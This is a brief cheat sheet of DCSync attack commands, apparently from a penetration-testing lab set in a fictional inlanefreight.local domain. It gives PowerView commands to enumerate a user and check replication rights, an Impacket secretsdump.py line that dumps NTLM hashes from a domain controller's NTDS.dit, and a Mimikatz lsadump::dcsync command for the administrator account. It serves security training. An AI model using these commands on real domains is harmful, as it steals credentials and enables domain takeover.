DCSync
1. View Group Membership of a Specific User
Command:
Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | flDescription: PowerView tool used to view the group membership of a specific user (
adunn) in a target Windows domain.
2. Check User's Replication Rights
Command:
$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | flDescription:
Creates a variable
SIDset to the SID of a user account.Uses PowerView's
Get-ObjectAclto check the user's replication rights in the target domain.
3. Extract NTLM Hashes from NTDS.dit
Command:
secretsdump.py -outputfile inlanefreight_hashes -justdc INLANEFREIGHT/adunn@172.16.5.5 -use-vssDescription: Impacket tool used to extract NTLM hashes from the
NTDS.ditfile on a target Domain Controller (172.16.5.5) and save the extracted hashes to a file (inlanefreight_hashes).Performed from a Linux-based host.
4. Perform a DCSync Attack Using Mimikatz
Command:
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administratorDescription: Uses Mimikatz to perform a DCSync attack and retrieve password hashes from a target Windows-based Domain Controller.
Last updated